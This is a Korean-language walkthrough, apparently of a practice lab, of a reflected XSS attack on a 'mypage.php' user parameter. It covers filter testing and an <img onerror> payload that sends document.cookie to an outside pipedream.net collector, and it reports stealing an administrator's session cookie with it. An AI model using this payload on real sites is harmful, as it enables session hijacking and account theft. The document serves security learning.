XSS 발생위치
URL: http://---/xss_3/mypage.php?user=fff
| 발생페이지 | 발생URL |
|---|---|
 |  |
XSS 종류
Reflected XSS
-
정의
삽입된 스크립트가 서버의 반응으로 클라이언트측에서 실행되는 것 -
특징
-> 즉각적임
-> 스크립트 Link(URL)로 전달 -> GET방식-> 파라미터로 스크립트 전송
XSS Point 찾기
Burp Suite에서 파라미터 바꿔보기 -> Reflected XSS가능
| 바꾸기전 | 바꾼후 |
|---|---|
 |  |
XSS 스크립트 삽입
특수문자 TEST
TEST방법
<,',",>넣어보기
| TEST |
|---|
 |
결과
<,',",>모두 사용할 수 있음
Filtering TEST
사용할 태그와 함수 TEST
<script>,<img>,alert()삽입
| TEST |
|---|
 |
결과
<script>,<img>,alert()모두 사용가능
Cookie정보 가져오기
Document.cookie로 쿠키 가져오기
<img>태그와alert()함수를 활용
good"/><img src=xhttps://velog.velcdn.com/images/ytew0435/post/bdaa6ce9-2ce1-46aa-8f69-01ed21414801/image.png">
-
good"/>을 쓴이유
-> 태그를 닫아주기 위함 -
img태그에"/>을 쓰지 않는 이유
-> 남은"/>가 있기 때문
<img>태그를 숨기기- 페이지에 방문하면
<img>가 나타남
-><img>태그에style="display:none;"삽입
<img>태그 error스크립트 삽입 후 
new Image()함수를 활용- 공격자 서버로 쿠키정보 전송
good"/><img+src=x+onerror="new+Image().src='https://env2ukig2umbh.x.pipedream.net?cookie='%2Bdocument.cookie삽입
스크립트 삽입 서버에서 결과확인 
관리자에게 TEST
- 스크립트가 삽입된 URL을 관리자에게 TEST
TEST 결과 
결과
세션ID가 포함된 쿠키정보 탈환성공
-
